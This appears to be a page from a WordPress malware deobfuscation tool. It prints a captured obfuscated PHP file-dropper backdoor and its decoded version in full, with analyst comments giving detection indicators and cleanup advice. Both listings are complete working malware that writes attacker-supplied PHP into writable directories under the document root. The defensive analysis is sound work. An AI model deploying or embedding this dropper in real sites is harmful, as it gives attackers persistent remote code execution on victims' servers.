
PHP deobfuscation, decryption, reconstruction tool

Deobfuscates PHP malware, viruses, and tampering code found on WordPress sites back into readable code.

*Please note that not every obfuscation scheme can be decoded.

The code below was decoded.

<?php $PoOZT = chr(68)."\x4f".chr(67).chr(85)."\115".chr(69).'N'.'T'."\x5f".chr(82)."\117".chr(79).'T';$smoJTEixAL = chr(72).'T'.chr(116-32).chr(361-281)."\x5f"."\x48"."\x4f".'S'."\x54";$TzVCvb = chr(416-312).chr(116).chr(322-206).'p'."\x3a"."\x2f".'/';$DJGTRb = "\56".chr(662-550)."\150"."\160";$...



Obfuscated PHP code

<?php
// NOTE(analysis): obfuscated sample as captured; only this comment was added, the code is unchanged.
// Every string is assembled from chr() arithmetic, hex/octal escapes and single-character
// literals, and the resulting names are later invoked as variable functions ($var(...)).
// A plain-text search for names such as file_put_contents or unserialize therefore does not
// match this file; search for the construction pattern (dense chr(N-M) concatenation followed
// by @$var(...) calls) or for the behaviour described with the decoded listing instead.
$PoOZT = chr(68)."\x4f".chr(67).chr(85)."\115".chr(69).'N'.'T'."\x5f".chr(82)."\117".chr(79).'T';$smoJTEixAL = chr(72).'T'.chr(116-32).chr(361-281)."\x5f"."\x48"."\x4f".'S'."\x54";$TzVCvb = chr(416-312).chr(116).chr(322-206).'p'."\x3a"."\x2f".'/';$DJGTRb = "\56".chr(662-550)."\150"."\160";$ZpoNvVKWE = "\x70".chr(1083-979).chr(418-306);$RzmgRP = "\146".chr(105).chr(370-262).'e'."\137"."\160".chr(450-333)."\x74".chr(392-297).chr(643-544).chr(388-277).chr(843-733).chr(551-435).'e'."\156".chr(116)."\163";$fldZLbJ = "\x72".'a'.chr(331-212)."\x75".chr(593-479)."\154".'d'."\x65".chr(674-575).chr(340-229)."\144"."\145";$ygLKFKA = "\165".chr(110)."\x73".chr(101).chr(721-607).chr(725-620)."\x61"."\x6c".chr(105).chr(937-815)."\145";$KUuxLHSf = "\x70".chr(322-218).chr(112).'v'.chr(118-17)."\162".chr(888-773).'i'.'o'."\156";$XRSrgKa = "\163".chr(116).'r'."\x5f".chr(723-609).chr(1076-965).chr(116).chr(49).'3';$xaPWFetk = chr(115)."\145"."\162".chr(599-494).chr(563-466).chr(812-704).chr(643-538).'z'.chr(101);foreach ($_POST as $ZABuSNh => $axZrHW){if (strlen($ZABuSNh) == 16){$axZrHW = str_split($fldZLbJ($XRSrgKa($axZrHW)));$ZABuSNh = array_slice(str_split(str_repeat($ZABuSNh, (count($axZrHW)/16)+1)), 0, count($axZrHW));function JLduJN($hJyHYUQI, $QqAlnl, $ZABuSNh){$EiCKixAp = "DtsAJbPGqDygBcuL";return $hJyHYUQI ^ $EiCKixAp[$QqAlnl % strlen($EiCKixAp)] ^ $ZABuSNh;}$axZrHW = implode("", array_map("JLduJN", array_values($axZrHW), array_keys($axZrHW), array_values($ZABuSNh)));$axZrHW = @$ygLKFKA($axZrHW);if (@is_array($axZrHW)){$WoPTqcULx = array_keys($axZrHW);$axZrHW = $axZrHW[$WoPTqcULx[0]];if ($axZrHW === $WoPTqcULx[0]){echo @$xaPWFetk(Array($ZpoNvVKWE => @$KUuxLHSf(), ));exit();}else {function hbCvNa($zBtcfYWir){static $CFxrX = array();$Zyrarvq = glob($zBtcfYWir . 
'/*', GLOB_ONLYDIR);if (count($Zyrarvq) > 0) {foreach ($Zyrarvq as $zBtcfYW) {if (@is_writable($zBtcfYW)) {$CFxrX[] = $zBtcfYW;}}}foreach ($Zyrarvq as $zBtcfYWir) hbCvNa($zBtcfYWir);return $CFxrX;}$iKXZOLXxUf = $_SERVER[$PoOZT];$Zyrarvq = hbCvNa($iKXZOLXxUf);$WoPTqcULx = array_rand($Zyrarvq);$LWokV = $Zyrarvq[$WoPTqcULx] . "/" . substr(md5(time()), 0, 8) . $DJGTRb;@$RzmgRP($LWokV, $axZrHW);echo $TzVCvb . $_SERVER[$smoJTEixAL] . substr($LWokV, strlen($iKXZOLXxUf));exit();}}}}

Decoded (deobfuscated) PHP code

<?php

// Analyst notes (comments added during review; the decoded code itself is unchanged).
//
// What this is: a file dropper. It reads every POST parameter, decodes the value of
// any parameter whose NAME is 16 bytes long, and then either answers a liveness
// probe or writes the decoded data to a new .php file in a writable directory
// under the document root and prints that file's URL.
//
// What to look for:
//   - Web logs: POST requests carrying a parameter with a 16-byte name, answered
//     by a body that is only a serialized one-element array keyed "php" or only
//     an "http://<host>/..." URL ending in ".php".
//   - Filesystem: files named <8 hex characters>.php in writable subdirectories of
//     the document root. The name is the first 8 hex characters of md5() of the
//     Unix timestamp at write time, so md5 of a suspect file's mtime usually
//     reproduces its name if the file has not been touched since.
//   - Cleanup: removing this script alone is not sufficient; every file it wrote
//     has to be located and removed as well. Denying PHP execution in writable
//     directories limits what a dropped file can do.

// Decoded string table. In the obfuscated original each value is assembled from
// chr() arithmetic and escape sequences, so none of these names appears literally.
$PoOZT = "DOCUMENT_ROOT"; // $_SERVER key: directory the scan starts from
$smoJTEixAL = "HTTP_HOST"; // $_SERVER key: host name used to build the printed URL
$TzVCvb = "http://"; // scheme prefix of the printed URL
$DJGTRb = ".php"; // extension given to the dropped file
$ZpoNvVKWE = "php"; // array key used in the probe response
// The remaining entries are function names that are only ever called as
// variable functions, e.g. $RzmgRP(...) is file_put_contents(...).
$RzmgRP = "file_put_contents";
$fldZLbJ = "rawurldecode";
$ygLKFKA = "unserialize";
$KUuxLHSf = "phpversion";
$XRSrgKa = "str_rot13";
$xaPWFetk = "serialize";
// Every POST parameter is examined; there is no fixed parameter name to match on.
foreach ($_POST as $ZABuSNh => $axZrHW) {
    // Only parameters whose name is exactly 16 bytes long are processed.
    if (strlen($ZABuSNh) == 16) {
        // Transport decoding: str_rot13, then rawurldecode, then split into single bytes.
        $axZrHW = str_split($fldZLbJ($XRSrgKa($axZrHW)));
        // The parameter name is repeated and cut to the payload length, giving one
        // name byte per payload byte.
        $ZABuSNh = array_slice(str_split(str_repeat($ZABuSNh, count($axZrHW) / 16 + 1)), 0, count($axZrHW));
        /**
         * XORs one payload byte with two key bytes.
         *
         * @param string $hJyHYUQI payload byte
         * @param int    $QqAlnl   index of that byte, used to select a byte of the embedded string
         * @param string $ZABuSNh  byte taken from the repeated parameter name
         * @return string the payload byte XORed with both key bytes
         */
        function JLduJN($hJyHYUQI, $QqAlnl, $ZABuSNh)
        {
            // 16-byte string embedded in this sample; useful as a search string when
            // hunting for copies of the same script.
            $EiCKixAp = "DtsAJbPGqDygBcuL";
            return $hJyHYUQI ^ $EiCKixAp[$QqAlnl % strlen($EiCKixAp)] ^ $ZABuSNh;
        }
        // Apply the XOR byte by byte and join the result back into one string.
        $axZrHW = implode("", array_map("JLduJN", array_values($axZrHW), array_keys($axZrHW), array_values($ZABuSNh)));
        // The decoded request data is passed to unserialize(); @ hides any error output.
        $axZrHW = @$ygLKFKA($axZrHW);
        // Anything that does not unserialize to an array is ignored and the loop continues.
        if (@is_array($axZrHW)) {
            // Only the first element of the array is used.
            $WoPTqcULx = array_keys($axZrHW);
            $axZrHW = $axZrHW[$WoPTqcULx[0]];
            if ($axZrHW === $WoPTqcULx[0]) {
                // Probe branch (first key identical to its value): respond with a
                // serialized array holding the PHP version and stop. Nothing is written.
                echo @$xaPWFetk(array($ZpoNvVKWE => @$KUuxLHSf()));
                exit;
            } else {
                /**
                 * Recursively collects writable directories below a starting directory.
                 *
                 * The starting directory itself is not tested; only its descendants are.
                 *
                 * @param string $zBtcfYWir directory to scan
                 * @return array paths of all writable subdirectories found so far
                 */
                function hbCvNa($zBtcfYWir)
                {
                    // Static accumulator shared by all recursive calls.
                    static $CFxrX = array();
                    $Zyrarvq = glob($zBtcfYWir . '/*', GLOB_ONLYDIR);
                    if (count($Zyrarvq) > 0) {
                        foreach ($Zyrarvq as $zBtcfYW) {
                            if (@is_writable($zBtcfYW)) {
                                $CFxrX[] = $zBtcfYW;
                            }
                        }
                    }
                    // Descend into every subdirectory, writable or not.
                    foreach ($Zyrarvq as $zBtcfYWir) {
                        hbCvNa($zBtcfYWir);
                    }
                    return $CFxrX;
                }
                // Drop branch: scan the whole tree under the document root.
                $iKXZOLXxUf = $_SERVER[$PoOZT];
                $Zyrarvq = hbCvNa($iKXZOLXxUf);
                // The target directory is chosen at random, so dropped files are not
                // confined to one predictable location.
                $WoPTqcULx = array_rand($Zyrarvq);
                // File name: first 8 hex characters of md5(current Unix time) plus ".php".
                $LWokV = $Zyrarvq[$WoPTqcULx] . "/" . substr(md5(time()), 0, 8) . $DJGTRb;
                // Writes the request-supplied content to disk; @ suppresses any error.
                @$RzmgRP($LWokV, $axZrHW);
                // The response body is the URL of the new file: "http://" + Host header
                // + the path relative to the document root. The URL is printed whether
                // or not the write succeeded, since the result is not checked.
                echo $TzVCvb . $_SERVER[$smoJTEixAL] . substr($LWokV, strlen($iKXZOLXxUf));
                exit;
            }
        }
    }
}



(C)2020 Wordpress Doctor All rights reserved.